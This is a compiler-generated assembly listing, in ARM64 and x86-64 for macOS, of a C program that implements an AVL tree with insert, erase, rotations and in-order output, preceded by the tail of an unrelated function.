%rdx, %rcx shlq $3, %rcx addq %rcx, %rax movslq -40(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero addsd -64(%rbp), %xmm0 movsd %xmm0, -64(%rbp) ## %bb.29: ## in Loop: Header=BB0_27 Depth=2 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB0_27 LBB0_30: ## in Loop: Header=BB0_25 Depth=1 jmp LBB0_31 LBB0_31: ## in Loop: Header=BB0_25 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_25 LBB0_32: movsd -64(%rbp), %xmm0 ## xmm0 = mem[0],zero leaq L_.str.1(%rip), %rdi movb $1, %al callq _printf addq $96, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%f" L_.str.2: ## @.str.2 .asciz "%s" .subsections_via_symbols
the_stack_data/1198595.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _init_NIL ; -- Begin function init_NIL .p2align 2 _init_NIL: ; @init_NIL .cfi_startproc ; %bb.0: adrp x8, _NIL@PAGE ldr x9, [x8, _NIL@PAGEOFF] str wzr, [x9] ldr x9, [x8, _NIL@PAGEOFF] str wzr, [x9, #4] ldr x9, [x8, _NIL@PAGEOFF] ; kill: def $x10 killed $xzr str xzr, [x9, #16] ldr x8, [x8, _NIL@PAGEOFF] str xzr, [x8, #8] ret .cfi_endproc ; -- End function .globl _getNewNode ; -- Begin function getNewNode .p2align 2 _getNewNode: ; @getNewNode .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] mov x0, #24 bl _malloc str x0, [sp] ldur w8, [x29, #-4] ldr x9, [sp] str w8, [x9] adrp x8, _NIL@PAGE ldr x8, [x8, _NIL@PAGEOFF] ldr x9, [sp] str x8, [x9, #16] ldr x9, [sp] str x8, [x9, #8] ldr x9, [sp] mov w8, #1 str w8, [x9, #4] ldr x0, [sp] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _UpdateHeight ; -- Begin function UpdateHeight .p2align 2 _UpdateHeight: ; @UpdateHeight .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] ldr x8, [sp, #24] ldr x8, [x8, #8] ldr w8, [x8, #4] str w8, [sp, #20] ldr x8, [sp, #24] ldr x8, [x8, #16] ldr w8, [x8, #4] str w8, [sp, #16] ldr w8, [sp, #20] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: ldr w8, [sp, #20] str w8, [sp, #12] ; 4-byte Folded Spill b LBB2_3 LBB2_2: ldr w8, [sp, #16] str w8, [sp, #12] ; 4-byte Folded Spill b LBB2_3 LBB2_3: ldr w8, [sp, #12] ; 4-byte Folded Reload add w8, w8, #1 ldr x9, [sp, #24] str w8, [x9, #4] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _left_rotate ; -- Begin function left_rotate .p2align 2 _left_rotate: ; @left_rotate .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x8, [sp, #8] ldr x8, [x8, #16] str x8, [sp] ldr x8, [sp] ldr x8, [x8, #8] ldr x9, [sp, #8] str x8, [x9, #16] ldr x8, [sp, #8] ldr x9, [sp] str x8, [x9, #8] ldr x0, [sp, #8] bl _UpdateHeight ldr x0, [sp] bl _UpdateHeight ldr x0, [sp] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _right_rotate ; -- Begin function right_rotate .p2align 2 _right_rotate: ; @right_rotate .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x8, [sp, #8] ldr x8, [x8, #8] str x8, [sp] ldr x8, [sp] ldr x8, [x8, #16] ldr x9, [sp, #8] str x8, [x9, #8] ldr x8, [sp, #8] ldr x9, [sp] str x8, [x9, #16] ldr x0, [sp, #8] bl _UpdateHeight ldr x0, [sp] bl _UpdateHeight ldr x0, [sp] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _maintain ; -- Begin function maintain .p2align 2 _maintain: ; @maintain .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp] ldr x8, [sp] ldr x8, [x8, #8] ldr w8, [x8, #4] ldr x9, [sp] ldr x9, [x9, #16] ldr w9, [x9, #4] subs w0, w8, w9 bl _abs subs w8, w0, #1 cset w8, gt tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: ldr x8, [sp] str x8, [sp, #8] b LBB5_10 LBB5_2: ldr x8, [sp] ldr x8, [x8, #8] ldr w8, [x8, #4] ldr x9, [sp] ldr x9, [x9, #16] ldr w9, [x9, #4] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB5_6 b LBB5_3 LBB5_3: ldr x8, [sp] ldr x8, [x8, #8] ldr x8, [x8, #16] ldr w8, [x8, #4] ldr x9, [sp] ldr x9, [x9, #8] ldr x9, [x9, #8] ldr w9, [x9, #4] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB5_5 b LBB5_4 LBB5_4: ldr x8, [sp] ldr x0, [x8, #8] bl _left_rotate ldr x8, [sp] str x0, [x8, #8] b LBB5_5 LBB5_5: ldr x0, [sp] bl _right_rotate str x0, [sp] b LBB5_9 LBB5_6: ldr x8, [sp] ldr x8, [x8, #16] ldr x8, [x8, #8] ldr w8, [x8, #4] ldr x9, [sp] ldr x9, [x9, #16] ldr x9, [x9, #16] ldr w9, [x9, #4] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB5_8 b LBB5_7 LBB5_7: ldr x8, [sp] ldr x0, [x8, #16] bl _right_rotate ldr x8, [sp] str x0, [x8, #16] b LBB5_8 LBB5_8: ldr x0, [sp] bl _left_rotate str x0, [sp] b LBB5_9 LBB5_9: ldr x8, [sp] str x8, [sp, #8] b LBB5_10 LBB5_10: ldr x0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _insert ; -- Begin function insert .p2align 2 _insert: ; @insert .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str w1, [sp, #12] ldr x8, [sp, #16] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB6_2 b LBB6_1 LBB6_1: ldr w0, [sp, #12] bl _getNewNode stur x0, [x29, #-8] b LBB6_8 LBB6_2: ldr x8, [sp, #16] ldr w8, [x8] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB6_4 b LBB6_3 LBB6_3: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB6_8 LBB6_4: ldr x8, [sp, #16] ldr w8, [x8] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB6_6 b LBB6_5 LBB6_5: ldr x8, [sp, #16] ldr x0, [x8, #8] ldr w1, [sp, #12] bl _insert ldr x8, [sp, #16] str x0, [x8, #8] b LBB6_7 LBB6_6: ldr x8, [sp, #16] ldr x0, [x8, #16] ldr w1, [sp, #12] bl _insert ldr x8, [sp, #16] str x0, [x8, #16] b LBB6_7 LBB6_7: ldr x0, [sp, #16] bl _UpdateHeight ldr x0, [sp, #16] bl _maintain stur x0, [x29, #-8] b LBB6_8 LBB6_8: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _predeccessor ; -- Begin function predeccessor .p2align 2 _predeccessor: ; @predeccessor .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] ldr x8, [sp, #8] ldr x8, [x8, #8] str x8, [sp] b LBB7_1 LBB7_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] ldr x8, [x8, #16] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB7_3 b LBB7_2 LBB7_2: ; in Loop: Header=BB7_1 Depth=1 ldr x8, [sp] ldr x8, [x8, #16] str x8, [sp] b LBB7_1 LBB7_3: ldr x0, [sp] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _erase ; -- Begin function erase .p2align 2 _erase: ; @erase .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur w1, [x29, #-20] ldur x8, [x29, #-16] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB8_2 b LBB8_1 LBB8_1: ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB8_16 LBB8_2: ldur x8, [x29, #-16] ldr w8, [x8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB8_4 b LBB8_3 LBB8_3: ldur x8, [x29, #-16] ldr x0, [x8, #8] ldur w1, [x29, #-20] bl _erase ldur x8, [x29, #-16] str x0, [x8, #8] b LBB8_15 LBB8_4: ldur x8, [x29, #-16] ldr w8, [x8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB8_6 b LBB8_5 LBB8_5: ldur x8, [x29, #-16] ldr x0, [x8, #16] ldur w1, [x29, #-20] bl _erase ldur x8, [x29, #-16] str x0, [x8, #16] b LBB8_14 LBB8_6: ldur x8, [x29, #-16] ldr x8, [x8, #8] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB8_8 b LBB8_7 LBB8_7: ldur x8, [x29, #-16] ldr x8, [x8, #16] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB8_12 b LBB8_8 LBB8_8: ldur x8, [x29, #-16] ldr x8, [x8, #8] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB8_10 b LBB8_9 LBB8_9: ldur x8, [x29, #-16] ldr x8, [x8, #16] str x8, [sp] ; 8-byte Folded Spill b LBB8_11 LBB8_10: ldur x8, [x29, #-16] ldr x8, [x8, #8] str x8, [sp] ; 8-byte Folded Spill b LBB8_11 LBB8_11: ldr x8, [sp] ; 8-byte Folded Reload str x8, [sp, #16] ldur x0, [x29, #-16] bl _free ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB8_16 LBB8_12: ldur x0, [x29, #-16] bl _predeccessor str x0, [sp, #8] ldr x8, [sp, #8] ldr w8, [x8] ldur x9, [x29, #-16] str w8, [x9] ldur x8, [x29, #-16] ldr x0, [x8, #8] ldr x8, [sp, #8] ldr w1, [x8] bl _erase ldur x8, [x29, #-16] str x0, [x8, #8] b LBB8_13 LBB8_13: b LBB8_14 LBB8_14: b LBB8_15 LBB8_15: ldur x0, [x29, #-16] bl _UpdateHeight ldur x0, [x29, #-16] bl _maintain stur x0, [x29, #-8] b LBB8_16 LBB8_16: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _clear ; -- Begin function clear .p2align 2 _clear: ; @clear .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x8, [sp, #8] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB9_2 b LBB9_1 LBB9_1: b LBB9_3 LBB9_2: ldr x8, [sp, #8] ldr x0, [x8, #8] bl _clear ldr x8, [sp, #8] ldr x0, [x8, #16] bl _clear ldr x0, [sp, #8] bl _free b LBB9_3 LBB9_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _output ; -- Begin function output .p2align 2 _output: ; @output .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] adrp x9, _NIL@PAGE ldr x9, [x9, _NIL@PAGEOFF] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB10_2 b LBB10_1 LBB10_1: b LBB10_3 LBB10_2: ldur x8, [x29, #-8] ldr x0, [x8, #8] bl _output ldur x8, [x29, #-8] ldr w8, [x8] ; implicit-def: $x11 mov x11, x8 ldur x8, [x29, #-8] ldr x8, [x8, #8] ldr w8, [x8] ; implicit-def: $x10 mov x10, x8 ldur x8, [x29, #-8] ldr x8, [x8, #16] ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x11, [x9] str x10, [x9, #8] str x8, [x9, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur x8, [x29, #-8] ldr x0, [x8, #16] bl _output b LBB10_3 LBB10_3: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] adrp x8, _NIL@PAGE ldr x8, [x8, _NIL@PAGEOFF] str x8, [sp, #24] b LBB11_1 LBB11_1: ; =>This Inner Loop Header: Depth=1 mov x9, sp sub x8, x29, #12 str x8, [x9] sub x8, x29, #8 str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf mvn w8, w0 subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB11_7 b LBB11_2 LBB11_2: ; in Loop: Header=BB11_1 Depth=1 ldur w8, [x29, #-12] str w8, [sp, #20] ; 4-byte Folded Spill subs w8, w8, #1 cset w8, eq tbnz w8, #0, LBB11_4 b LBB11_3 LBB11_3: ; in Loop: Header=BB11_1 Depth=1 ldr w8, [sp, #20] ; 4-byte Folded Reload subs w8, w8, #2 cset w8, eq tbnz w8, #0, LBB11_5 b LBB11_6 LBB11_4: ; in Loop: Header=BB11_1 Depth=1 ldr x0, [sp, #24] ldur w1, [x29, #-8] bl _insert str x0, [sp, #24] b LBB11_6 LBB11_5: ; in Loop: Header=BB11_1 Depth=1 ldr x0, [sp, #24] ldur w1, [x29, #-8] bl _erase str x0, [sp, #24] b LBB11_6 LBB11_6: ; in Loop: Header=BB11_1 Depth=1 ldr x0, [sp, #24] bl _output b LBB11_1 LBB11_7: mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .comm __NIL,24,3 ; @_NIL .section __DATA,__data .globl _NIL ; @NIL .p2align 3 _NIL: .quad __NIL .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d [%d, %d]\n" l_.str.1: ; @.str.1 .asciz "%d%d" .section __DATA,__mod_init_func,mod_init_funcs .p2align 3 .quad _init_NIL .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _init_NIL ## -- Begin function init_NIL .p2align 4, 0x90 _init_NIL: ## @init_NIL .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _NIL(%rip), %rax movl $0, (%rax) movq _NIL(%rip), %rax movl $0, 4(%rax) movq _NIL(%rip), %rax movq $0, 16(%rax) movq _NIL(%rip), %rax movq $0, 8(%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _getNewNode ## -- Begin function getNewNode .p2align 4, 0x90 _getNewNode: ## @getNewNode .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl $24, %edi callq _malloc movq %rax, -16(%rbp) movl -4(%rbp), %ecx movq -16(%rbp), %rax movl %ecx, (%rax) movq _NIL(%rip), %rcx movq -16(%rbp), %rax movq %rcx, 16(%rax) movq -16(%rbp), %rax movq %rcx, 8(%rax) movq -16(%rbp), %rax movl $1, 4(%rax) movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _UpdateHeight ## -- Begin function UpdateHeight .p2align 4, 0x90 _UpdateHeight: ## @UpdateHeight .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movl 4(%rax), %eax movl %eax, -12(%rbp) movq -8(%rbp), %rax movq 16(%rax), %rax movl 4(%rax), %eax movl %eax, -16(%rbp) movl -12(%rbp), %eax cmpl -16(%rbp), %eax jle LBB2_2 ## %bb.1: movl -12(%rbp), %eax movl %eax, -20(%rbp) ## 4-byte Spill jmp LBB2_3 LBB2_2: movl -16(%rbp), %eax movl %eax, -20(%rbp) ## 4-byte Spill LBB2_3: movl -20(%rbp), %ecx ## 4-byte Reload addl $1, %ecx movq -8(%rbp), %rax movl %ecx, 4(%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _left_rotate ## -- Begin function left_rotate .p2align 4, 0x90 _left_rotate: ## @left_rotate .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq 16(%rax), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movq 8(%rax), %rcx movq -8(%rbp), %rax movq %rcx, 16(%rax) movq -8(%rbp), %rcx movq -16(%rbp), %rax movq %rcx, 8(%rax) movq -8(%rbp), %rdi callq _UpdateHeight movq -16(%rbp), %rdi callq _UpdateHeight movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _right_rotate ## -- Begin function right_rotate .p2align 4, 0x90 _right_rotate: ## @right_rotate .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movq 16(%rax), %rcx movq -8(%rbp), %rax movq %rcx, 8(%rax) movq -8(%rbp), %rcx movq -16(%rbp), %rax movq %rcx, 16(%rax) movq -8(%rbp), %rdi callq _UpdateHeight movq -16(%rbp), %rdi callq _UpdateHeight movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _maintain ## -- Begin function maintain .p2align 4, 0x90 _maintain: ## @maintain .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -16(%rbp) movq -16(%rbp), %rax movq 8(%rax), %rax movl 4(%rax), %edi movq -16(%rbp), %rax movq 16(%rax), %rax subl 4(%rax), %edi callq _abs cmpl $1, %eax jg LBB5_2 ## %bb.1: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB5_10 LBB5_2: movq -16(%rbp), %rax movq 8(%rax), %rax movl 4(%rax), %eax movq -16(%rbp), %rcx movq 16(%rcx), %rcx cmpl 4(%rcx), %eax jle LBB5_6 ## %bb.3: movq -16(%rbp), %rax movq 8(%rax), %rax movq 16(%rax), %rax movl 4(%rax), %eax movq -16(%rbp), %rcx movq 8(%rcx), %rcx movq 8(%rcx), %rcx cmpl 4(%rcx), %eax jle LBB5_5 ## %bb.4: movq -16(%rbp), %rax movq 8(%rax), %rdi callq _left_rotate movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 8(%rax) LBB5_5: movq -16(%rbp), %rdi callq _right_rotate movq %rax, -16(%rbp) jmp LBB5_9 LBB5_6: movq -16(%rbp), %rax movq 16(%rax), %rax movq 8(%rax), %rax movl 4(%rax), %eax movq -16(%rbp), %rcx movq 16(%rcx), %rcx movq 16(%rcx), %rcx cmpl 4(%rcx), %eax jle LBB5_8 ## %bb.7: movq -16(%rbp), %rax movq 16(%rax), %rdi callq _right_rotate movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 16(%rax) LBB5_8: movq -16(%rbp), %rdi callq _left_rotate movq %rax, -16(%rbp) LBB5_9: movq -16(%rbp), %rax movq %rax, -8(%rbp) LBB5_10: movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _insert ## -- Begin function insert .p2align 4, 0x90 _insert: ## @insert .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq -16(%rbp), %rax cmpq _NIL(%rip), %rax jne LBB6_2 ## %bb.1: movl -20(%rbp), %edi callq _getNewNode movq %rax, -8(%rbp) jmp LBB6_8 LBB6_2: movq -16(%rbp), %rax movl (%rax), %eax cmpl -20(%rbp), %eax jne LBB6_4 ## %bb.3: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB6_8 LBB6_4: movq -16(%rbp), %rax movl (%rax), %eax cmpl -20(%rbp), %eax jle LBB6_6 ## %bb.5: movq -16(%rbp), %rax movq 8(%rax), %rdi movl -20(%rbp), %esi callq _insert movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 8(%rax) jmp LBB6_7 LBB6_6: movq -16(%rbp), %rax movq 16(%rax), %rdi movl -20(%rbp), %esi callq _insert movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 16(%rax) LBB6_7: movq -16(%rbp), %rdi callq _UpdateHeight movq -16(%rbp), %rdi callq _maintain movq %rax, -8(%rbp) LBB6_8: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _predeccessor ## -- Begin function predeccessor .p2align 4, 0x90 _predeccessor: ## @predeccessor .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movq %rax, -16(%rbp) LBB7_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax movq 16(%rax), %rax cmpq _NIL(%rip), %rax je LBB7_3 ## %bb.2: ## in Loop: Header=BB7_1 Depth=1 movq -16(%rbp), %rax movq 16(%rax), %rax movq %rax, -16(%rbp) jmp LBB7_1 LBB7_3: movq -16(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _erase ## -- Begin function erase .p2align 4, 0x90 _erase: ## @erase .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq -16(%rbp), %rax cmpq _NIL(%rip), %rax jne LBB8_2 ## %bb.1: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB8_16 LBB8_2: movq -16(%rbp), %rax movl (%rax), %eax cmpl -20(%rbp), %eax jle LBB8_4 ## %bb.3: movq -16(%rbp), %rax movq 8(%rax), %rdi movl -20(%rbp), %esi callq _erase movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 8(%rax) jmp LBB8_15 LBB8_4: movq -16(%rbp), %rax movl (%rax), %eax cmpl -20(%rbp), %eax jge LBB8_6 ## %bb.5: movq -16(%rbp), %rax movq 16(%rax), %rdi movl -20(%rbp), %esi callq _erase movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 16(%rax) jmp LBB8_14 LBB8_6: movq -16(%rbp), %rax movq 8(%rax), %rax cmpq _NIL(%rip), %rax je LBB8_8 ## %bb.7: movq -16(%rbp), %rax movq 16(%rax), %rax cmpq _NIL(%rip), %rax jne LBB8_12 LBB8_8: movq -16(%rbp), %rax movq 8(%rax), %rax cmpq _NIL(%rip), %rax jne LBB8_10 ## %bb.9: movq -16(%rbp), %rax movq 16(%rax), %rax movq %rax, -48(%rbp) ## 8-byte Spill jmp LBB8_11 LBB8_10: movq -16(%rbp), %rax movq 8(%rax), %rax movq %rax, -48(%rbp) ## 8-byte Spill LBB8_11: movq -48(%rbp), %rax ## 8-byte Reload movq %rax, -32(%rbp) movq -16(%rbp), %rdi callq _free movq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB8_16 LBB8_12: movq -16(%rbp), %rdi callq _predeccessor movq %rax, -40(%rbp) movq -40(%rbp), %rax movl (%rax), %ecx movq -16(%rbp), %rax movl %ecx, (%rax) movq -16(%rbp), %rax movq 8(%rax), %rdi movq -40(%rbp), %rax movl (%rax), %esi callq _erase movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 8(%rax) ## %bb.13: jmp LBB8_14 LBB8_14: jmp LBB8_15 LBB8_15: movq -16(%rbp), %rdi callq _UpdateHeight movq -16(%rbp), %rdi callq _maintain movq %rax, -8(%rbp) LBB8_16: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _clear ## -- Begin function clear .p2align 4, 0x90 _clear: ## @clear .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax cmpq _NIL(%rip), %rax jne LBB9_2 ## %bb.1: jmp LBB9_3 LBB9_2: movq -8(%rbp), %rax movq 8(%rax), %rdi callq _clear movq -8(%rbp), %rax movq 16(%rax), %rdi callq _clear movq -8(%rbp), %rdi callq _free LBB9_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _output ## -- Begin function output .p2align 4, 0x90 _output: ## @output .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax cmpq _NIL(%rip), %rax jne LBB10_2 ## %bb.1: jmp LBB10_3 LBB10_2: movq -8(%rbp), %rax movq 8(%rax), %rdi callq _output movq -8(%rbp), %rax movl (%rax), %esi movq -8(%rbp), %rax movq 8(%rax), %rax movl (%rax), %edx movq -8(%rbp), %rax movq 16(%rax), %rax movl (%rax), %ecx leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rax movq 16(%rax), %rdi callq _output LBB10_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movq _NIL(%rip), %rax movq %rax, -24(%rbp) LBB11_1: ## =>This Inner Loop Header: Depth=1 leaq L_.str.1(%rip), %rdi leaq -12(%rbp), %rsi leaq -8(%rbp), %rdx movb $0, %al callq _scanf xorl $-1, %eax cmpl $0, %eax je LBB11_6 ## %bb.2: ## in Loop: Header=BB11_1 Depth=1 movl -12(%rbp), %eax movl %eax, -28(%rbp) ## 4-byte Spill subl $1, %eax je LBB11_3 jmp LBB11_7 LBB11_7: ## in Loop: Header=BB11_1 Depth=1 movl -28(%rbp), %eax ## 4-byte Reload subl $2, %eax je LBB11_4 jmp LBB11_5 LBB11_3: ## in Loop: Header=BB11_1 Depth=1 movq -24(%rbp), %rdi movl -8(%rbp), %esi callq _insert movq %rax, -24(%rbp) jmp 